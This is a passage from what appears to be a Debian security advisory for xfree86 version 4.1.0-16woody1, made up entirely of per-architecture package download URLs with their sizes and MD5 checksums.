0a840cb6a2ad4b800c19e0ccfebb7225\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/x/xfree86/lbxproxy_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 127008 dbe5ce6140c4867cdcd8c19e16cafd7c\n http://security.debian.org/pool/updates/main/x/xfree86/libdps-dev_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 231820 ab45bf783d22460b17e7bec16083a7bb\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 176174 3df97696ae3bf267e127a604bee474c5\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1-dbg_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 432602 9c55fd39dd48c6acae5447a4a76a463d\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 162988 d3c24329255f11838a9c880eca9b388b\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dbg_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 340310 38e7b70d621e11d7509c05fea5aa0499\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dev_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 282708 f292b664b1c534b4eaeb9e091cac49ed\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 207472 689ce43213019ae32acb3a7b12ccbee6\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dbg_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 442826 ffc3121a9fae59ce0b51a1e990c35c7a\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dev_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 282600 02486152f99e4bd77df4d57a291a296f\n http://security.debian.org/pool/updates/main/x/xfree86/proxymngr_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 74866 47aeaa1825535861410b295f8f6df659\n http://security.debian.org/pool/updates/main/x/xfree86/twm_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 147248 e76441fe6e830b1f97a7577fac88c116\n http://security.debian.org/pool/updates/main/x/xfree86/x-window-system-core_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 59842 61aba227ab1fd8e50af023c8acc4e330\n http://security.debian.org/pool/updates/main/x/xfree86/xbase-clients_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 1375040 06079bbb9cf37f2e5dbb53889193493f\n http://security.debian.org/pool/updates/main/x/xfree86/xdm_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 167718 e9b474eebb48ac6f2cff62eaf41e1cbf\n http://security.debian.org/pool/updates/main/x/xfree86/xfs_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 255870 3142c834fa0d1ce281c803294ce5aa6b\n http://security.debian.org/pool/updates/main/x/xfree86/xfwp_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 79272 0aec62a2fe0fe5ecbf757b3c6a4db715\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa-dev_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 519110 8cb70e074a1e632c651bd68cb38378e9\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 335086 edf50388426c5b579226a679cff5a5cc\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3-dbg_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 863944 cba183f599ae2ca957f36e48261396e1\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 1181742 62ae21dff505723f3d11fb5c17d8ea66\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dbg_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 2574676 c306abc6aef2942b5995d94f900490a4\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dev_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 2646876 d4e7a7cd7c4c13f810052c8b643e08bd\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-pic_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 72148 49a5e29a05a4406cc11431f0f1b20ba0\n http://security.debian.org/pool/updates/main/x/xfree86/xmh_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 121936 6374116d7cdbb6efa5f707b83ae19641\n http://security.debian.org/pool/updates/main/x/xfree86/xnest_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 1234076 8824c964fb2d53a21104a51f3e396dd8\n http://security.debian.org/pool/updates/main/x/xfree86/xprt_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 1005382 4ffa681cb6036a792273442a2b7288c3\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-common_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 218960 fae95e5facb8e35bcdd18b10c34eb5e8\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-xfree86_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 3534668 fedfec67b52253517b6297ff0cce147a\n http://security.debian.org/pool/updates/main/x/xfree86/xterm_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 477948 ecf8278610d1c35b689da84fed1a1795\n http://security.debian.org/pool/updates/main/x/xfree86/xutils_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 550590 1347810170b9560db0ea98ad5e835b81\n http://security.debian.org/pool/updates/main/x/xfree86/xvfb_4.1.0-16woody1_m68k.deb\n Size/MD5 checksum: 1324804 e64204608996a661cb439c6b99583879\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/x/xfree86/lbxproxy_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 152696 58307ae6023161f4e70f6db8e9c0881a\n http://security.debian.org/pool/updates/main/x/xfree86/libdps-dev_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 276756 55e1366e21a1797214f9d24725b4ebc3\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 173464 84be8782692b320dbb481bc3f544867c\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1-dbg_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 575694 656a05ac46d9a5fbe1ffe794573b77c4\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 182104 56830e22490f5cbcc587ad0bc3740792\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dbg_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 550560 2c18454e544519525634a331b59dde78\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dev_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 349704 deca77fa44505a6b68f6fc8478a164f5\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 232746 7507e667fbd7df69d40ef2f550628a29\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dbg_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 690662 41a9e9aac54cd265269fa962cc0a943b\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dev_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 349586 bf5fe8a34e182eb026f8f95815b99693\n http://security.debian.org/pool/updates/main/x/xfree86/proxymngr_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 77178 12566dc9e83db107099c084a70926220\n http://security.debian.org/pool/updates/main/x/xfree86/twm_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 167598 10ff1ea073a48ea20bc97b3275cdb576\n http://security.debian.org/pool/updates/main/x/xfree86/x-window-system-core_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 59836 dac6e74a3014ab11fa0a538207931cb2\n http://security.debian.org/pool/updates/main/x/xfree86/xbase-clients_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 1652590 c40da32a5ae517ec38285788a26c4761\n http://security.debian.org/pool/updates/main/x/xfree86/xdm_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 176612 40219c45448bde5c69e6aabdffb6cb7b\n http://security.debian.org/pool/updates/main/x/xfree86/xfs_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 337446 6f373a574a73761eea3ec24ec66a738d\n http://security.debian.org/pool/updates/main/x/xfree86/xfwp_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 82704 0bd57463cfcb29a7b383acbd2859b8cb\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa-dev_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 633136 24a4ffe9b9d464efa1f16d678b7db59a\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 357364 44c324f45b32566c418ed04407ae7ea4\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3-dbg_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 1077144 27700fa762bb2d85e10a3ee6b3f9faff\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 1309070 7655459919286fd611181ce13c90a5ba\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dbg_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 3733628 bb8deb898cf291ad5403eaa073a5a713\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dev_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 3124642 07186a0f70295fb3501cf6d6dae01b2b\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-pic_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 78068 a4740bd259dcb8f31be89e8413f91c1c\n http://security.debian.org/pool/updates/main/x/xfree86/xmh_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 140362 b00fc2fbf8b922f1a7b2893913a549ec\n http://security.debian.org/pool/updates/main/x/xfree86/xnest_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 1774730 d394771a7a1ab1955373a0009f5f561c\n http://security.debian.org/pool/updates/main/x/xfree86/xprt_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 1440038 a4cff2ba160c4703ca7c17facc648a5d\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-common_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 218902 9324678772065ae2b41e5fea376499bf\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-xfree86_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 3385496 80cb9414b4b9b225f8f261b4207af888\n http://security.debian.org/pool/updates/main/x/xfree86/xterm_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 505810 af3bc564c5da2dd9ada9ee39dddcf96e\n http://security.debian.org/pool/updates/main/x/xfree86/xutils_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 661608 968d1738abcb6f3cf1ec258d051290e9\n http://security.debian.org/pool/updates/main/x/xfree86/xvfb_4.1.0-16woody1_mips.deb\n Size/MD5 checksum: 1910010 bc534cd077c4bfcff3f45cc521866d4d\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/x/xfree86/lbxproxy_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 152248 7ec5232c3d668ec2d52bddad0cdf91f9\n http://security.debian.org/pool/updates/main/x/xfree86/libdps-dev_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 276114 6146cadf896005dfb7bfa3831ecf6d13\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 171976 b675d1f9353d77d6b364c0b946a7d985\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1-dbg_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 558832 06b9c9736951d7b47768a7d903847bc9\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 180496 6842c0b93da4081cdd61e7b641036fca\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dbg_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 535446 93431115055a6470f4cf6d8aa255ac8a\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dev_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 348804 9d68bbe1e79c690166e5fa80e24e6cbb\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 230484 df60b766f7006a8251fbde607129a98c\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dbg_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 668626 1e55de8b45657c96867873bcab98e719\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dev_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 348698 16ff0e605956891dedaabcdfca36676b\n http://security.debian.org/pool/updates/main/x/xfree86/proxymngr_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 77148 1a256a4a355949b27393132bc13af33a\n http://security.debian.org/pool/updates/main/x/xfree86/twm_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 167060 7e0653120f27be58a8bf73e940e610f2\n http://security.debian.org/pool/updates/main/x/xfree86/x-window-system-core_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 59838 92bc21c03fb99575e13d848ec2de9619\n http://security.debian.org/pool/updates/main/x/xfree86/xbase-clients_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 1649074 92ed8c24e85f11bedf7e71c5649b4745\n http://security.debian.org/pool/updates/main/x/xfree86/xdm_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 176442 84efce020df023b9c47382b4e17d88e4\n http://security.debian.org/pool/updates/main/x/xfree86/xfs_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 336880 222e0469582b625b93b77fad8fe80a55\n http://security.debian.org/pool/updates/main/x/xfree86/xfwp_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 82762 d5961a631d0cdae5c9ce10fa6cde4d0e\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa-dev_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 623882 79a50212b1aaaaccfbebd2967fbf99eb\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 353670 517b26c37fffa966bdfe5a3234d5c05f\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3-dbg_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 1043962 167697a057e11279d10b6fd56e96ceb3\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 1303890 c26cf3174fff378380810d0569a1bbd2\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dbg_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 3609098 9345252b0262a85c35f2e7841572410d\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dev_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 3112818 170638c162e74e40edbb14435ec7773f\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-pic_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 78002 841e634e71cda56e148ace9290c9b36c\n http://security.debian.org/pool/updates/main/x/xfree86/xmh_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 140248 f1ffbea11892e7045f49bfc094dc4b9f\n http://security.debian.org/pool/updates/main/x/xfree86/xnest_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 1772834 b9adef15a1861f09bdcb4c1b2c8a6b80\n http://security.debian.org/pool/updates/main/x/xfree86/xprt_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 1438862 bb5c0085cd38699996ca4968902aad5d\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-common_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 218900 4fd0614bb78afc53c07b184ea69111fc\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-xfree86_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 3383226 bc26f05e74b91c5144c7921f43ea271b\n http://security.debian.org/pool/updates/main/x/xfree86/xterm_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 505200 93461004335593f9020857ff4bb5f426\n http://security.debian.org/pool/updates/main/x/xfree86/xutils_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 661534 b7159e48186ae613a8c88b5191e6a70c\n http://security.debian.org/pool/updates/main/x/xfree86/xvfb_4.1.0-16woody1_mipsel.deb\n Size/MD5 checksum: 1906082 c6446dfcd7ffdbd5c9ba231df3fa0f89\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/x/xfree86/lbxproxy_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 140856 cff62cda8037370ed8d2855a9c13a8a2\n http://security.debian.org/pool/updates/main/x/xfree86/libdps-dev_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 259506 39d8b42620092d2ea7f9db15d2080c1d\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 187356 0bab1863617cb2be405082feb5b542e4\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1-dbg_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 445466 600a1c5c647d8e069c6612ef19d7134d\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 178344 d356234e25d58426727f396283af1601\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dbg_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 355670 f50f5d58a5ce5b21a8d5ec4accdedce1\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dev_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 330432 8a8728d24a8d24fc2a91aa53737d2467\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 231894 fb3ea3d8b9ac7885cdb3d776a73df5f2\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dbg_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 468828 e2216a4ac014f7ef86dd9ffbb704eae1\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dev_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 330318 3035dd3ee0918b64d9d117c60985c382\n http://security.debian.org/pool/updates/main/x/xfree86/proxymngr_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 76348 900b1dc23dd7172fd583580bac6c9966\n http://security.debian.org/pool/updates/main/x/xfree86/twm_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 159860 a8af399963df2748db052329fa5356a5\n http://security.debian.org/pool/updates/main/x/xfree86/x-window-system-core_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 59832 777642929cae8fb09cec8923411b39a0\n http://security.debian.org/pool/updates/main/x/xfree86/xbase-clients_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 1609036 f01b9e60d35142a752d900f9b837e570\n http://security.debian.org/pool/updates/main/x/xfree86/xdm_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 171858 0b1924068fbaaf443587cff7e8214265\n http://security.debian.org/pool/updates/main/x/xfree86/xfs_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 303994 65efabc5bce1f411d63148a3ecf52912\n http://security.debian.org/pool/updates/main/x/xfree86/xfwp_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 81796 058bafcf058cd740dca12b0be9d49fac\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa-dev_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 605772 c2ac0b4bfcf1265e3a3e04365c17a94f\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 2448394 13ede7269683a0023a0870f61b162788\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3-dbg_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 923256 08add16bd826cd43c6eb80a237b732ec\n http://security.debian.org/pool/updates/main/x/xfree86/xlibosmesa-dev_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 622812 bbd9412bc1afafdf256c2d8260bc03b4\n http://security.debian.org/pool/updates/main/x/xfree86/xlibosmesa3_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 529810 f51a5bf8f83e1373d5f894913dddf4f8\n http://security.debian.org/pool/updates/main/x/xfree86/xlibosmesa3-dbg_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 1086818 e2f980f38b98267386bb6901d2860e28\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 1299246 be2336f5fd92075172f9a2eccc506a50\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dbg_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 2701380 4a0db8d2de23db9c42c1ec97f88cf775\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dev_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 2984616 63cf5b6a130da604bb37d4d735a5224e\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-pic_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 76056 e3b357204d6605ea0ec3d83b04a01871\n http://security.debian.org/pool/updates/main/x/xfree86/xmh_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 131878 bf0e9e39023198c1c89e3f36720d6c7a\n http://security.debian.org/pool/updates/main/x/xfree86/xnest_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 1579354 1118c7f3cf81e9f2de035d3751750fd9\n http://security.debian.org/pool/updates/main/x/xfree86/xprt_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 1274394 3483121378d1d2c2d2f5d69a05c4abd9\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-common_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 218938 4b2953bbff6f58904e69363e89971dcf\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-xfree86_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 4617160 763ec729da2d3ca6f79e432efe25db24\n http://security.debian.org/pool/updates/main/x/xfree86/xterm_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 492640 852e848f8f5a4c21f35c79144530e04a\n http://security.debian.org/pool/updates/main/x/xfree86/xutils_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 603546 a5d4f4129c4d55797d034bf747325285\n http://security.debian.org/pool/updates/main/x/xfree86/xvfb_4.1.0-16woody1_powerpc.deb\n Size/MD5 checksum: 1707414 bee0e9fee2b844bb02b0b5c5fdbbeca9\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/x/xfree86/lbxproxy_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 139202 4d2444dc345e92a9097334dfcea1a548\n http://security.debian.org/pool/updates/main/x/xfree86/libdps-dev_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 234492 4615a1e721d9ab657116c4111ff49788\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 176232 2009035d89073d140aece6ba1ab00271\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1-dbg_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 446942 1bf29aca766e1f3aa751cd1d410720d8\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 183286 48647d25e4a97a218e392ecb3a67d46b\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dbg_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 368062 036457958fc45acac1a1c20c87238d09\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dev_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 308140 b6241ab9be34e54161b93e5b3c3d8a0d\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 234440 038e7d094f80da86098e2f3f89b790aa\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dbg_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 480094 8bb9187cd9832079f0aee6c36b5f275a\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dev_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 308016 a354d4bddb8d9f9eaf7d18ca03631d38\n http://security.debian.org/pool/updates/main/x/xfree86/proxymngr_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 76524 d9c8251b36489fb7e64920f27ab2ff4c\n http://security.debian.org/pool/updates/main/x/xfree86/twm_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 163348 3510a8e10112c3204181841cb74d1b9c\n http://security.debian.org/pool/updates/main/x/xfree86/x-window-system-core_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 59824 2e960f34451ae212f85a0e20b8bbcd33\n http://security.debian.org/pool/updates/main/x/xfree86/xbase-clients_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 1254724 de8b6f2bac1de1a4768bfd2b18eac2a8\n http://security.debian.org/pool/updates/main/x/xfree86/xdm_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 174064 d408eab05d8f6af4135d0823235bf241\n http://security.debian.org/pool/updates/main/x/xfree86/xfs_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 292054 1c58d690de86cc55ec577b748a36bdac\n http://security.debian.org/pool/updates/main/x/xfree86/xfwp_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 82002 82d9d0054ce7b02cc95a29ee6f66b0a4\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa-dev_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 550310 9ef4444028de21a8069f310176eefd59\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 360228 df2f4e562c566ef1143a7372faf147be\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3-dbg_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 911784 e46e160bf4c008a29ac85ede0a974a5a\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 1194690 57229a9ed63ca2dbab612553e1277365\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dbg_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 2482792 0ad01dae08a86804e9aee43d2ffd847c\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dev_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 2620830 3c5cf6bd2c6ff852a0e53334beb7cdb9\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-pic_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 74862 19fd0d0703cdd85a5dc73026b67ffd42\n http://security.debian.org/pool/updates/main/x/xfree86/xmh_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 127902 c8a8432c990da1207bbe1aa5b34d3f65\n http://security.debian.org/pool/updates/main/x/xfree86/xnest_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 1179868 88a8dcfccbd4f6b68d8b8ecaf0f198c1\n http://security.debian.org/pool/updates/main/x/xfree86/xprt_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 870698 e136f0530ce7ba5f95cba93f06412ea6\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-common_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 219498 339659a9c0e731d673900a67ca942249\n http://security.debian.org/pool/updates/main/x/xfree86/xterm_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 492124 ceb0658d8478724f7ab842068c3034ea\n http://security.debian.org/pool/updates/main/x/xfree86/xutils_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 579628 042ecebd29e631cfbfcf525f0f43db9f\n http://security.debian.org/pool/updates/main/x/xfree86/xvfb_4.1.0-16woody1_s390.deb\n Size/MD5 checksum: 1292006 c069d6c652060377930f1168c61a1eab\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/x/xfree86/lbxproxy_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 139446 106b788380a9b1fa4ba541013cfbc146\n http://security.debian.org/pool/updates/main/x/xfree86/libdps-dev_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 246648 dc6136933ff17ebc7a55bd1df748c983\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 182234 2ee03cc307cca31d949173c7355080b5\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1-dbg_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 443994 fd6d1ca43ad067d90bb408c8b1596d79\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 171760 c0529add728bbdd3b9a05ae34569c7e4\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dbg_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 347110 6f18ba80459a8b7db8067d4258d560d3\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dev_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 308312 